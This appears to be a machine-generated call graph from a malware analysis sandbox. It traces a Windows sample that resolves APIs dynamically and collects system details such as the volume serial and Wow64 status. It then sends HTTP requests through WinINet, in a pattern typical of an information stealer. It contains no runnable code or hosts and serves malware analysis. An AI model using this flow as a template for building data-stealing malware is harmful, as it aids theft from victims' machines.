14298 de3609 14297->14298 14299 de45c0 2 API calls 14298->14299 14300 de3622 14299->14300 14301 de45c0 2 API calls 14300->14301 14302 de363b 14301->14302 14303 de45c0 2 API calls 14302->14303 14304 de3654 14303->14304 14305 de45c0 2 API calls 14304->14305 14306 de366d 14305->14306 14307 de45c0 2 API calls 14306->14307 14308 de3686 14307->14308 14309 de45c0 2 API calls 14308->14309 14310 de369f 14309->14310 14311 de45c0 2 API calls 14310->14311 14312 de36b8 14311->14312 14313 de45c0 2 API calls 14312->14313 14314 de36d1 14313->14314 14315 de45c0 2 API calls 14314->14315 14316 de36ea 14315->14316 14317 de45c0 2 API calls 14316->14317 14318 de3703 14317->14318 14319 de45c0 2 API calls 14318->14319 14320 de371c 14319->14320 14321 de45c0 2 API calls 14320->14321 14322 de3735 14321->14322 14323 de45c0 2 API calls 14322->14323 14324 de374e 14323->14324 14325 de45c0 2 API calls 14324->14325 14326 de3767 14325->14326 14327 de45c0 2 API calls 14326->14327 14328 de3780 14327->14328 14329 de45c0 2 API calls 14328->14329 14330 de3799 14329->14330 14331 de45c0 2 API calls 14330->14331 14332 de37b2 14331->14332 14333 de45c0 2 API calls 14332->14333 14334 de37cb 14333->14334 14335 de45c0 2 API calls 14334->14335 14336 de37e4 14335->14336 14337 de45c0 2 API calls 14336->14337 14338 de37fd 14337->14338 14339 de45c0 2 API calls 14338->14339 14340 de3816 14339->14340 14341 de45c0 2 API calls 14340->14341 14342 de382f 14341->14342 14343 de45c0 2 API calls 14342->14343 14344 de3848 14343->14344 14345 de45c0 2 API calls 14344->14345 14346 de3861 14345->14346 14347 de45c0 2 API calls 14346->14347 14348 de387a 14347->14348 14349 de45c0 2 API calls 14348->14349 14350 de3893 14349->14350 14351 de45c0 2 API calls 14350->14351 14352 de38ac 14351->14352 14353 de45c0 2 API calls 14352->14353 14354 de38c5 14353->14354 14355 de45c0 2 API calls 14354->14355 14356 de38de 14355->14356 14357 de45c0 2 API calls 14356->14357 14358 de38f7 14357->14358 14359 de45c0 2 API calls 14358->14359 14360 de3910 14359->14360 14361 de45c0 2 API calls 14360->14361 14362 de3929 14361->14362 14363 de45c0 2 API calls 14362->14363 14364 de3942 14363->14364 14365 de45c0 2 API calls 14364->14365 14366 de395b 14365->14366 14367 de45c0 2 API calls 14366->14367 14368 de3974 14367->14368 14369 de45c0 2 API calls 14368->14369 14370 de398d 14369->14370 14371 de45c0 2 API calls 14370->14371 14372 de39a6 14371->14372 14373 de45c0 2 API calls 14372->14373 14374 de39bf 14373->14374 14375 de45c0 2 API calls 14374->14375 14376 de39d8 14375->14376 14377 de45c0 2 API calls 14376->14377 14378 de39f1 14377->14378 14379 de45c0 2 API calls 14378->14379 14380 de3a0a 14379->14380 14381 de45c0 2 API calls 14380->14381 14382 de3a23 14381->14382 14383 de45c0 2 API calls 14382->14383 14384 de3a3c 14383->14384 14385 de45c0 2 API calls 14384->14385 14386 de3a55 14385->14386 14387 de45c0 2 API calls 14386->14387 14388 de3a6e 14387->14388 14389 de45c0 2 API calls 14388->14389 14390 de3a87 14389->14390 14391 de45c0 2 API calls 14390->14391 14392 de3aa0 14391->14392 14393 de45c0 2 API calls 14392->14393 14394 de3ab9 14393->14394 14395 de45c0 2 API calls 14394->14395 14396 de3ad2 14395->14396 14397 de45c0 2 API calls 14396->14397 14398 de3aeb 14397->14398 14399 de45c0 2 API calls 14398->14399 14400 de3b04 14399->14400 14401 de45c0 2 API calls 14400->14401 14402 de3b1d 14401->14402 14403 de45c0 2 API calls 14402->14403 14404 de3b36 14403->14404 14405 de45c0 2 API calls 14404->14405 14406 de3b4f 14405->14406 14407 de45c0 2 API calls 14406->14407 14408 de3b68 14407->14408 14409 de45c0 2 API calls 14408->14409 14410 de3b81 14409->14410 14411 de45c0 2 API calls 14410->14411 14412 de3b9a 14411->14412 14413 de45c0 2 API calls 14412->14413 14414 de3bb3 14413->14414 14415 de45c0 2 API calls 14414->14415 14416 de3bcc 14415->14416 14417 de45c0 2 API calls 14416->14417 14418 de3be5 14417->14418 14419 de45c0 2 API calls 14418->14419 14420 de3bfe 14419->14420 14421 de45c0 2 API calls 14420->14421 14422 de3c17 14421->14422 14423 de45c0 2 API calls 14422->14423 14424 de3c30 14423->14424 14425 de45c0 2 API calls 14424->14425 14426 de3c49 14425->14426 14427 de45c0 2 API calls 14426->14427 14428 de3c62 14427->14428 14429 de45c0 2 API calls 14428->14429 14430 de3c7b 14429->14430 14431 de45c0 2 API calls 14430->14431 14432 de3c94 14431->14432 14433 de45c0 2 API calls 14432->14433 14434 de3cad 14433->14434 14435 de45c0 2 API calls 14434->14435 14436 de3cc6 14435->14436 14437 de45c0 2 API calls 14436->14437 14438 de3cdf 14437->14438 14439 de45c0 2 API calls 14438->14439 14440 de3cf8 14439->14440 14441 de45c0 2 API calls 14440->14441 14442 de3d11 14441->14442 14443 de45c0 2 API calls 14442->14443 14444 de3d2a 14443->14444 14445 de45c0 2 API calls 14444->14445 14446 de3d43 14445->14446 14447 de45c0 2 API calls 14446->14447 14448 de3d5c 14447->14448 14449 de45c0 2 API calls 14448->14449 14450 de3d75 14449->14450 14451 de45c0 2 API calls 14450->14451 14452 de3d8e 14451->14452 14453 de45c0 2 API calls 14452->14453 14454 de3da7 14453->14454 14455 de45c0 2 API calls 14454->14455 14456 de3dc0 14455->14456 14457 de45c0 2 API calls 14456->14457 14458 de3dd9 14457->14458 14459 de45c0 2 API calls 14458->14459 14460 de3df2 14459->14460 14461 de45c0 2 API calls 14460->14461 14462 de3e0b 14461->14462 14463 de45c0 2 API calls 14462->14463 14464 de3e24 14463->14464 14465 de45c0 2 API calls 14464->14465 14466 de3e3d 14465->14466 14467 de45c0 2 API calls 14466->14467 14468 de3e56 14467->14468 14469 de45c0 2 API calls 14468->14469 14470 de3e6f 14469->14470 14471 de45c0 2 API calls 14470->14471 14472 de3e88 14471->14472 14473 de45c0 2 API calls 14472->14473 14474 de3ea1 14473->14474 14475 de45c0 2 API calls 14474->14475 14476 de3eba 14475->14476 14477 de45c0 2 API calls 14476->14477 14478 de3ed3 14477->14478 14479 de45c0 2 API calls 14478->14479 14480 de3eec 14479->14480 14481 de45c0 2 API calls 14480->14481 14482 de3f05 14481->14482 14483 de45c0 2 API calls 14482->14483 14484 de3f1e 14483->14484 14485 de45c0 2 API calls 14484->14485 14486 de3f37 14485->14486 14487 de45c0 2 API calls 14486->14487 14488 de3f50 14487->14488 14489 de45c0 2 API calls 14488->14489 14490 de3f69 14489->14490 14491 de45c0 2 API calls 14490->14491 14492 de3f82 14491->14492 14493 de45c0 2 API calls 14492->14493 14494 de3f9b 14493->14494 14495 de45c0 2 API calls 14494->14495 14496 de3fb4 14495->14496 14497 de45c0 2 API calls 14496->14497 14498 de3fcd 14497->14498 14499 de45c0 2 API calls 14498->14499 14500 de3fe6 14499->14500 14501 de45c0 2 API calls 14500->14501 14502 de3fff 14501->14502 14503 de45c0 2 API calls 14502->14503 14504 de4018 14503->14504 14505 de45c0 2 API calls 14504->14505 14506 de4031 14505->14506 14507 de45c0 2 API calls 14506->14507 14508 de404a 14507->14508 14509 de45c0 2 API calls 14508->14509 14510 de4063 14509->14510 14511 de45c0 2 API calls 14510->14511 14512 de407c 14511->14512 14513 de45c0 2 API calls 14512->14513 14514 de4095 14513->14514 14515 de45c0 2 API calls 14514->14515 14516 de40ae 14515->14516 14517 de45c0 2 API calls 14516->14517 14518 de40c7 14517->14518 14519 de45c0 2 API calls 14518->14519 14520 de40e0 14519->14520 14521 de45c0 2 API calls 14520->14521 14522 de40f9 14521->14522 14523 de45c0 2 API calls 14522->14523 14524 de4112 14523->14524 14525 de45c0 2 API calls 14524->14525 14526 de412b 14525->14526 14527 de45c0 2 API calls 14526->14527 14528 de4144 14527->14528 14529 de45c0 2 API calls 14528->14529 14530 de415d 14529->14530 14531 de45c0 2 API calls 14530->14531 14532 de4176 14531->14532 14533 de45c0 2 API calls 14532->14533 14534 de418f 14533->14534 14535 de45c0 2 API calls 14534->14535 14536 de41a8 14535->14536 14537 de45c0 2 API calls 14536->14537 14538 de41c1 14537->14538 14539 de45c0 2 API calls 14538->14539 14540 de41da 14539->14540 14541 de45c0 2 API calls 14540->14541 14542 de41f3 14541->14542 14543 de45c0 2 API calls 14542->14543 14544 de420c 14543->14544 14545 de45c0 2 API calls 14544->14545 14546 de4225 14545->14546 14547 de45c0 2 API calls 14546->14547 14548 de423e 14547->14548 14549 de45c0 2 API calls 14548->14549 14550 de4257 14549->14550 14551 de45c0 2 API calls 14550->14551 14552 de4270 14551->14552 14553 de45c0 2 API calls 14552->14553 14554 de4289 14553->14554 14555 de45c0 2 API calls 14554->14555 14556 de42a2 14555->14556 14557 de45c0 2 API calls 14556->14557 14558 de42bb 14557->14558 14559 de45c0 2 API calls 14558->14559 14560 de42d4 14559->14560 14561 de45c0 2 API calls 14560->14561 14562 de42ed 14561->14562 14563 de45c0 2 API calls 14562->14563 14564 de4306 14563->14564 14565 de45c0 2 API calls 14564->14565 14566 de431f 14565->14566 14567 de45c0 2 API calls 14566->14567 14568 de4338 14567->14568 14569 de45c0 2 API calls 14568->14569 14570 de4351 14569->14570 14571 de45c0 2 API calls 14570->14571 14572 de436a 14571->14572 14573 de45c0 2 API calls 14572->14573 14574 de4383 14573->14574 14575 de45c0 2 API calls 14574->14575 14576 de439c 14575->14576 14577 de45c0 2 API calls 14576->14577 14578 de43b5 14577->14578 14579 de45c0 2 API calls 14578->14579 14580 de43ce 14579->14580 14581 de45c0 2 API calls 14580->14581 14582 de43e7 14581->14582 14583 de45c0 2 API calls 14582->14583 14584 de4400 14583->14584 14585 de45c0 2 API calls 14584->14585 14586 de4419 14585->14586 14587 de45c0 2 API calls 14586->14587 14588 de4432 14587->14588 14589 de45c0 2 API calls 14588->14589 14590 de444b 14589->14590 14591 de45c0 2 API calls 14590->14591 14592 de4464 14591->14592 14593 de45c0 2 API calls 14592->14593 14594 de447d 14593->14594 14595 de45c0 2 API calls 14594->14595 14596 de4496 14595->14596 14597 de45c0 2 API calls 14596->14597 14598 de44af 14597->14598 14599 de45c0 2 API calls 14598->14599 14600 de44c8 14599->14600 14601 de45c0 2 API calls 14600->14601 14602 de44e1 14601->14602 14603 de45c0 2 API calls 14602->14603 14604 de44fa 14603->14604 14605 de45c0 2 API calls 14604->14605 14606 de4513 14605->14606 14607 de45c0 2 API calls 14606->14607 14608 de452c 14607->14608 14609 de45c0 2 API calls 14608->14609 14610 de4545 14609->14610 14611 de45c0 2 API calls 14610->14611 14612 de455e 14611->14612 14613 de45c0 2 API calls 14612->14613 14614 de4577 14613->14614 14615 de45c0 2 API calls 14614->14615 14616 de4590 14615->14616 14617 de45c0 2 API calls 14616->14617 14618 de45a9 14617->14618 14619 df9c10 14618->14619 14620 dfa036 8 API calls 14619->14620 14621 df9c20 43 API calls 14619->14621 14622 dfa0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14620->14622 14623 dfa146 14620->14623 14621->14620 14622->14623 14624 dfa216 14623->14624 14625 dfa153 8 API calls 14623->14625 14626 dfa21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14624->14626 14627 dfa298 14624->14627 14625->14624 14626->14627 14628 dfa337 14627->14628 14629 dfa2a5 6 API calls 14627->14629 14630 dfa41f 14628->14630 14631 dfa344 9 API calls 14628->14631 14629->14628 14632 dfa428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14630->14632 14633 dfa4a2 14630->14633 14631->14630 14632->14633 14634 dfa4dc 14633->14634 14635 dfa4ab GetProcAddress GetProcAddress 14633->14635 14636 dfa515 14634->14636 14637 dfa4e5 GetProcAddress GetProcAddress 14634->14637 14635->14634 14638 dfa612 14636->14638 14639 dfa522 10 API calls 14636->14639 14637->14636 14640 dfa67d 14638->14640 14641 dfa61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14638->14641 14639->14638 14642 dfa69e 14640->14642 14643 dfa686 GetProcAddress 14640->14643 14641->14640 14644 df5ca3 14642->14644 14645 dfa6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14642->14645 14643->14642 14646 de1590 14644->14646 14645->14644 15767 de1670 14646->15767 14649 dfa7a0 lstrcpy 14650 de15b5 14649->14650 14651 dfa7a0 lstrcpy 14650->14651 14652 de15c7 14651->14652 14653 dfa7a0 lstrcpy 14652->14653 14654 de15d9 14653->14654 14655 dfa7a0 lstrcpy 14654->14655 14656 de1663 14655->14656 14657 df5510 14656->14657 14658 df5521 14657->14658 14659 dfa820 2 API calls 14658->14659 14660 df552e 14659->14660 14661 dfa820 2 API calls 14660->14661 14662 df553b 14661->14662 14663 dfa820 2 API calls 14662->14663 14664 df5548 14663->14664 14665 dfa740 lstrcpy 14664->14665 14666 df5555 14665->14666 14667 dfa740 lstrcpy 14666->14667 14668 df5562 14667->14668 14669 dfa740 lstrcpy 14668->14669 14670 df556f 14669->14670 14671 dfa740 lstrcpy 14670->14671 14692 df557c 14671->14692 14672 dfa740 lstrcpy 14672->14692 14673 dfa820 lstrlen lstrcpy 14673->14692 14674 dfa8a0 lstrcpy 14674->14692 14675 df5643 StrCmpCA 14675->14692 14676 df56a0 StrCmpCA 14677 df57dc 14676->14677 14676->14692 14679 dfa8a0 lstrcpy 14677->14679 14678 dfa7a0 lstrcpy 14678->14692 14680 df57e8 14679->14680 14681 dfa820 2 API calls 14680->14681 14682 df57f6 14681->14682 14685 dfa820 2 API calls 14682->14685 14683 df5856 StrCmpCA 14686 df5991 14683->14686 14683->14692 14684 df51f0 20 API calls 14684->14692 14687 df5805 14685->14687 14688 dfa8a0 lstrcpy 14686->14688 14690 de1670 lstrcpy 14687->14690 14689 df599d 14688->14689 14691 dfa820 2 API calls 14689->14691 14710 df5811 14690->14710 14693 df59ab 14691->14693 14692->14672 14692->14673 14692->14674 14692->14675 14692->14676 14692->14678 14692->14683 14692->14684 14694 df5a0b StrCmpCA 14692->14694 14695 df52c0 25 API calls 14692->14695 14706 df578a StrCmpCA 14692->14706 14709 df593f StrCmpCA 14692->14709 14711 de1590 lstrcpy 14692->14711 14696 dfa820 2 API calls 14693->14696 14697 df5a28 14694->14697 14698 df5a16 Sleep 14694->14698 14695->14692 14699 df59ba 14696->14699 14700 dfa8a0 lstrcpy 14697->14700 14698->14692 14701 de1670 lstrcpy 14699->14701 14702 df5a34 14700->14702 14701->14710 14703 dfa820 2 API calls 14702->14703 14704 df5a43 14703->14704 14705 dfa820 2 API calls 14704->14705 14707 df5a52 14705->14707 14706->14692 14708 de1670 lstrcpy 14707->14708 14708->14710 14709->14692 14710->13764 14711->14692 14713 df754c 14712->14713 14714 df7553 GetVolumeInformationA 14712->14714 14713->14714 14715 df7591 14714->14715 14716 df75fc GetProcessHeap RtlAllocateHeap 14715->14716 14717 df7619 14716->14717 14718 df7628 wsprintfA 14716->14718 14720 dfa740 lstrcpy 14717->14720 14719 dfa740 lstrcpy 14718->14719 14721 df5da7 14719->14721 14720->14721 14721->13785 14723 dfa7a0 lstrcpy 14722->14723 14724 de4899 14723->14724 15776 de47b0 14724->15776 14726 de48a5 14727 dfa740 lstrcpy 14726->14727 14728 de48d7 14727->14728 14729 dfa740 lstrcpy 14728->14729 14730 de48e4 14729->14730 14731 dfa740 lstrcpy 14730->14731 14732 de48f1 14731->14732 14733 dfa740 lstrcpy 14732->14733 14734 de48fe 14733->14734 14735 dfa740 lstrcpy 14734->14735 14736 de490b InternetOpenA StrCmpCA 14735->14736 14737 de4944 14736->14737 14738 de4ecb InternetCloseHandle 14737->14738 15782 df8b60 14737->15782 14740 de4ee8 14738->14740 15797 de9ac0 CryptStringToBinaryA 14740->15797 14741 de4963 15790 dfa920 14741->15790 14744 de4976 14746 dfa8a0 lstrcpy 14744->14746 14751 de497f 14746->14751 14747 dfa820 2 API calls 14748 de4f05 14747->14748 14750 dfa9b0 4 API calls 14748->14750 14749 de4f27 ctype 14753 dfa7a0 lstrcpy 14749->14753 14752 de4f1b 14750->14752 14755 dfa9b0 4 API calls 14751->14755 14754 dfa8a0 lstrcpy 14752->14754 14766 de4f57 14753->14766 14754->14749 14756 de49a9 14755->14756 14757 dfa8a0 lstrcpy 14756->14757 14758 de49b2 14757->14758 14759 dfa9b0 4 API calls 14758->14759 14760 de49d1 14759->14760 14761 dfa8a0 lstrcpy 14760->14761 14762 de49da 14761->14762 14763 dfa920 3 API calls 14762->14763 14764 de49f8 14763->14764 14765 dfa8a0 lstrcpy 14764->14765 14767 de4a01 14765->14767 14766->13788 14768 dfa9b0 4 API calls 14767->14768 14769 de4a20 14768->14769 14770 dfa8a0 lstrcpy 14769->14770 14771 de4a29 14770->14771 14772 dfa9b0 4 API calls 14771->14772 14773 de4a48 14772->14773 14774 dfa8a0 lstrcpy 14773->14774 14775 de4a51 14774->14775 14776 dfa9b0 4 API calls 14775->14776 14777 de4a7d 14776->14777 14778 dfa920 3 API calls 14777->14778 14779 de4a84 14778->14779 14780 dfa8a0 lstrcpy 14779->14780 14781 de4a8d 14780->14781 14782 de4aa3 InternetConnectA 14781->14782 14782->14738 14783 de4ad3 HttpOpenRequestA 14782->14783 14785 de4ebe InternetCloseHandle 14783->14785 14786 de4b28 14783->14786 14785->14738 14787 dfa9b0 4 API calls 14786->14787 14788 de4b3c 14787->14788 14789 dfa8a0 lstrcpy 14788->14789 14790 de4b45 14789->14790 14791 dfa920 3 API calls 14790->14791 14792 de4b63 14791->14792 14793 dfa8a0 lstrcpy 14792->14793 14794 de4b6c 14793->14794 14795 dfa9b0 4 API calls 14794->14795 14796 de4b8b 14795->14796 14797 dfa8a0 lstrcpy 14796->14797 14798 de4b94 14797->14798 14799 dfa9b0 4 API calls 14798->14799 14800 de4bb5 14799->14800 14801 dfa8a0 lstrcpy 14800->14801 14802 de4bbe 14801->14802 14803 dfa9b0 4 API calls 14802->14803 14804 de4bde 14803->14804 14805 dfa8a0 lstrcpy 14804->14805 14806 de4be7 14805->14806 14807 dfa9b0 4 API calls 14806->14807 14808 de4c06 14807->14808 14809 dfa8a0 lstrcpy 14808->14809 14810 de4c0f 14809->14810 14811 dfa920 3 API calls 14810->14811 14812 de4c2d 14811->14812 14813 dfa8a0 lstrcpy 14812->14813 14814 de4c36 14813->14814 14815 dfa9b0 4 API calls 14814->14815 14816 de4c55 14815->14816 14817 dfa8a0 lstrcpy 14816->14817 14818 de4c5e 14817->14818 14819 dfa9b0 4 API calls 14818->14819 14820 de4c7d 14819->14820 14821 dfa8a0 lstrcpy 14820->14821 14822 de4c86 14821->14822 14823 dfa920 3 API calls 14822->14823 14824 de4ca4 14823->14824 14825 dfa8a0 lstrcpy 14824->14825 14826 de4cad 14825->14826 14827 dfa9b0 4 API calls 14826->14827 14828 de4ccc 14827->14828 14829 dfa8a0 lstrcpy 14828->14829 14830 de4cd5 14829->14830 14831 dfa9b0 4 API calls 14830->14831 14832 de4cf6 14831->14832 14833 dfa8a0 lstrcpy 14832->14833 14834 de4cff 14833->14834 14835 dfa9b0 4 API calls 14834->14835 14836 de4d1f 14835->14836 14837 dfa8a0 lstrcpy 14836->14837 14838 de4d28 14837->14838 14839 dfa9b0 4 API calls 14838->14839 14840 de4d47 14839->14840 14841 dfa8a0 lstrcpy 14840->14841 14842 de4d50 14841->14842 14843 dfa920 3 API calls 14842->14843 14844 de4d6e 14843->14844 14845 dfa8a0 lstrcpy 14844->14845 14846 de4d77 14845->14846 14847 dfa740 lstrcpy 14846->14847 14848 de4d92 14847->14848 14849 dfa920 3 API calls 14848->14849 14850 de4db3 14849->14850 14851 dfa920 3 API calls 14850->14851 14852 de4dba 14851->14852 14853 dfa8a0 lstrcpy 14852->14853 14854 de4dc6 14853->14854 14855 de4de7 lstrlen 14854->14855 14856 de4dfa 14855->14856 14857 de4e03 lstrlen 14856->14857 15796 dfaad0 14857->15796 14859 de4e13 HttpSendRequestA 14860 de4e32 InternetReadFile 14859->14860 14861 de4e67 InternetCloseHandle 14860->14861 14866 de4e5e 14860->14866 14863 dfa800 14861->14863 14863->14785 14864 dfa9b0 4 API calls 14864->14866 14865 dfa8a0 lstrcpy 14865->14866 14866->14860 14866->14861 14866->14864 14866->14865 15803 dfaad0 14867->15803 14869 df17c4 StrCmpCA 14870 df17cf ExitProcess 14869->14870 14874 df17d7 14869->14874 14871 df19c2 14871->13790 14872 df187f StrCmpCA 14872->14874 14873 df185d StrCmpCA 14873->14874 14874->14871 14874->14872 14874->14873 14875 df1913 StrCmpCA 14874->14875 14876 df1932 StrCmpCA 14874->14876 14877 df18f1 StrCmpCA 14874->14877 14878 df1951 StrCmpCA 14874->14878 14879 df1970 StrCmpCA 14874->14879 14880 df18cf StrCmpCA 14874->14880 14881 df18ad StrCmpCA 14874->14881 14882 dfa820 lstrlen lstrcpy 14874->14882 14875->14874 14876->14874 14877->14874 14878->14874 14879->14874 14880->14874 14881->14874 14882->14874 14884 dfa7a0 lstrcpy 14883->14884 14885 de5979 14884->14885 14886 de47b0 2 API calls 14885->14886 14887 de5985 14886->14887 14888 dfa740 lstrcpy 14887->14888 14889 de59ba 14888->14889 14890 dfa740 lstrcpy 14889->14890 14891 de59c7 14890->14891 14892 dfa740 lstrcpy 14891->14892 14893 de59d4 14892->14893 14894 dfa740 lstrcpy 14893->14894 14895 de59e1 14894->14895 14896 dfa740 lstrcpy 14895->14896 14897 de59ee InternetOpenA StrCmpCA 14896->14897 14898 de5a1d 14897->14898 14899 de5fc3 InternetCloseHandle 14898->14899 14901 df8b60 3 API calls 14898->14901 14900 de5fe0 14899->14900 14904 de9ac0 4 API calls 14900->14904 14902 de5a3c 14901->14902 14903 dfa920 3 API calls 14902->14903 14905 de5a4f 14903->14905 14906 de5fe6 14904->14906 14907 dfa8a0 lstrcpy 14905->14907 14908 dfa820 2 API calls 14906->14908 14910 de601f ctype 14906->14910 14912 de5a58 14907->14912 14909 de5ffd 14908->14909 14911 dfa9b0 4 API calls 14909->14911 14914 dfa7a0 lstrcpy 14910->14914 14913 de6013 14911->14913 14916 dfa9b0 4 API calls 14912->14916 14915 dfa8a0 lstrcpy 14913->14915 14924 de604f 14914->14924 14915->14910 14917 de5a82 14916->14917 14918 dfa8a0 lstrcpy 14917->14918 14919 de5a8b 14918->14919 14920 dfa9b0 4 API calls 14919->14920 14921 de5aaa 14920->14921 14922 dfa8a0 lstrcpy 14921->14922 14923 de5ab3 14922->14923 14925 dfa920 3 API calls 14923->14925 14924->13796 14926 de5ad1 14925->14926 14927 dfa8a0 lstrcpy 14926->14927 14928 de5ada 14927->14928 14929 dfa9b0 4 API calls 14928->14929 14930 de5af9 14929->14930 14931 dfa8a0 lstrcpy 14930->14931 14932 de5b02 14931->14932 14933 dfa9b0 4 API calls 14932->14933 14934 de5b21 14933->14934 14935 dfa8a0 lstrcpy 14934->14935 14936 de5b2a 14935->14936 14937 dfa9b0 4 API calls 14936->14937 14938 de5b56 14937->14938 14939 dfa920 3 API calls 14938->14939 14940 de5b5d 14939->14940 14941 dfa8a0 lstrcpy 14940->14941 14942 de5b66 14941->14942 14943 de5b7c InternetConnectA 14942->14943 14943->14899 14944 de5bac HttpOpenRequestA 14943->14944 14946 de5c0b 14944->14946 14947 de5fb6 InternetCloseHandle 14944->14947 14948 dfa9b0 4 API calls 14946->14948 14947->14899 14949 de5c1f 14948->14949 14950 dfa8a0 lstrcpy 14949->14950 14951 de5c28 14950->14951 14952 dfa920 3 API calls 14951->14952 14953 de5c46 14952->14953 14954 dfa8a0 lstrcpy 14953->14954 14955 de5c4f 14954->14955 14956 dfa9b0 4 API calls 14955->14956 14957 de5c6e 14956->14957 14958 dfa8a0 lstrcpy 14957->14958 14959 de5c77 14958->14959 14960 dfa9b0 4 API calls 14959->14960 14961 de5c98 14960->14961 14962 dfa8a0 lstrcpy 14961->14962 14963 de5ca1 14962->14963 14964 dfa9b0 4 API calls 14963->14964 14965 de5cc1 14964->14965 14966 dfa8a0 lstrcpy 14965->14966 14967 de5cca 14966->14967 14968 dfa9b0 4 API calls 14967->14968 14969 de5ce9 14968->14969 14970 dfa8a0 lstrcpy 14969->14970 14971 de5cf2 14970->14971 14972 dfa920 3 API calls 14971->14972 14973 de5d10 14972->14973 14974 dfa8a0 lstrcpy 14973->14974 14975 de5d19 14974->14975 14976 dfa9b0 4 API calls 14975->14976 14977 de5d38 14976->14977 14978 dfa8a0 lstrcpy 14977->14978 14979 de5d41 14978->14979 14980 dfa9b0 4 API calls 14979->14980 14981 de5d60 14980->14981 14982 dfa8a0 lstrcpy 14981->14982 14983 de5d69 14982->14983 14984 dfa920 3 API calls 14983->14984 14985 de5d87 14984->14985 14986 dfa8a0 lstrcpy 14985->14986 14987 de5d90 14986->14987 14988 dfa9b0 4 API calls 14987->14988 14989 de5daf 14988->14989 14990 dfa8a0 lstrcpy 14989->14990 14991 de5db8 14990->14991 14992 dfa9b0 4 API calls 14991->14992 14993 de5dd9 14992->14993 14994 dfa8a0 lstrcpy 14993->14994 14995 de5de2 14994->14995 14996 dfa9b0 4 API calls 14995->14996 14997 de5e02 14996->14997 14998 dfa8a0 lstrcpy 14997->14998 14999 de5e0b 14998->14999 15000 dfa9b0 4 API calls 14999->15000 15001 de5e2a 15000->15001 15002 dfa8a0 lstrcpy 15001->15002 15003 de5e33 15002->15003 15004 dfa920 3 API calls 15003->15004 15005 de5e54 15004->15005 15006 dfa8a0 lstrcpy 15005->15006 15007 de5e5d 15006->15007 15008 de5e70 lstrlen 15007->15008 15804 dfaad0 15008->15804 15010 de5e81 lstrlen GetProcessHeap RtlAllocateHeap 15805 dfaad0 15010->15805 15012 de5eae lstrlen 15013 de5ebe 15012->15013 15014 de5ed7 lstrlen 15013->15014 15015 de5ee7 15014->15015 15016 de5ef0 lstrlen 15015->15016 15017 de5f04 15016->15017 15018 de5f1a lstrlen 15017->15018 15806 dfaad0 15018->15806 15020 de5f2a HttpSendRequestA 15021 de5f35 InternetReadFile 15020->15021 15022 de5f6a InternetCloseHandle 15021->15022 15026 de5f61 15021->15026 15022->14947 15024 dfa9b0 4 API calls 15024->15026 15025 dfa8a0 lstrcpy 15025->15026 15026->15021 15026->15022 15026->15024 15026->15025 15029 df1077 15027->15029 15028 df1151 15028->13798 15029->15028 15030 dfa820 lstrlen lstrcpy 15029->15030 15030->15029 15032 df0db7 15031->15032 15033 df0e27 StrCmpCA 15032->15033 15034 df0e67 StrCmpCA 15032->15034 15035 df0ea4 StrCmpCA 15032->15035 15036 df0f17 15032->15036 15037 dfa820 lstrlen lstrcpy 15032->15037 15033->15032 15034->15032 15035->15032 15036->13806 15037->15032 15040 df0f67 15038->15040 15039 df1044 15039->13814 15040->15039 15041 df0fb2 StrCmpCA 15040->15041 15042 dfa820 lstrlen lstrcpy 15040->15042 15041->15040 15042->15040 15044 dfa740 lstrcpy 15043->15044 15045 df1a26 15044->15045 15046 dfa9b0 4 API calls 15045->15046 15047 df1a37 15046->15047 15048 dfa8a0 lstrcpy 15047->15048 15049 df1a40 15048->15049 15050 dfa9b0 4 API calls 15049->15050 15051 df1a5b 15050->15051 15052 dfa8a0 lstrcpy 15051->15052 15053 df1a64 15052->15053 15054 dfa9b0 4 API calls 15053->15054 15055 df1a7d 15054->15055 15056 dfa8a0 lstrcpy 15055->15056 15057 df1a86 15056->15057 15058 dfa9b0 4 API calls 15057->15058 15059 df1aa1 15058->15059 15060 dfa8a0 lstrcpy 15059->15060 15061 df1aaa 15060->15061 15062 dfa9b0 4 API calls 15061->15062 15063 df1ac3 15062->15063 15064 dfa8a0 lstrcpy 15063->15064 15065 df1acc 15064->15065 15066 dfa9b0 4 API calls 15065->15066 15067 df1ae7 15066->15067 15068 dfa8a0 lstrcpy 15067->15068 15069 df1af0 15068->15069 15070 dfa9b0 4 API calls 15069->15070 15071 df1b09 15070->15071 15072 dfa8a0 lstrcpy 15071->15072 15073 df1b12 15072->15073 15074 dfa9b0 4 API calls 15073->15074 15075 df1b2d 15074->15075 15076 dfa8a0 lstrcpy 15075->15076 15077 df1b36 15076->15077 15078 dfa9b0 4 API calls 15077->15078 15079 df1b4f 15078->15079 15080 dfa8a0 lstrcpy 15079->15080 15081 df1b58 15080->15081 15082 dfa9b0 4 API calls 15081->15082 15083 df1b76 15082->15083 15084 dfa8a0 lstrcpy 15083->15084 15085 df1b7f 15084->15085 15086 df7500 6 API calls 15085->15086 15087 df1b96 15086->15087 15088 dfa920 3 API calls 15087->15088 15089 df1ba9 15088->15089 15090 dfa8a0 lstrcpy 15089->15090 15091 df1bb2 15090->15091 15092 dfa9b0 4 API calls 15091->15092 15093 df1bdc 15092->15093 15094 dfa8a0 lstrcpy 15093->15094 15095 df1be5 15094->15095 15096 dfa9b0 4 API calls 15095->15096 15097 df1c05 15096->15097 15098 dfa8a0 lstrcpy 15097->15098 15099 df1c0e 15098->15099 15807 df7690 GetProcessHeap RtlAllocateHeap 15099->15807 15102 dfa9b0 4 API calls 15103 df1c2e 15102->15103 15104 dfa8a0 lstrcpy 15103->15104 15105 df1c37 15104->15105 15106 dfa9b0 4 API calls 15105->15106 15107 df1c56 15106->15107 15108 dfa8a0 lstrcpy 15107->15108 15109 df1c5f 15108->15109 15110 dfa9b0 4 API calls 15109->15110 15111 df1c80 15110->15111 15112 dfa8a0 lstrcpy 15111->15112 15113 df1c89 15112->15113 15814 df77c0 GetCurrentProcess IsWow64Process 15113->15814 15116 dfa9b0 4 API calls 15117 df1ca9 15116->15117 15118 dfa8a0 lstrcpy 15117->15118 15119 df1cb2 15118->15119 15120 dfa9b0 4 API calls 15119->15120 15121 df1cd1 15120->15121 15122 dfa8a0 lstrcpy 15121->15122 15123 df1cda 15122->15123 15124 dfa9b0 4 API calls 15123->15124 15125 df1cfb 15124->15125 15126 dfa8a0 lstrcpy 